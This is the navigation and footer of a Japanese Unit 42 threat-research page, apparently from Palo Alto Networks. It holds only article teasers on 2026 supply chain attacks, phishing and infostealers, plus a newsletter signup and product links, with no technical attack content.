  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
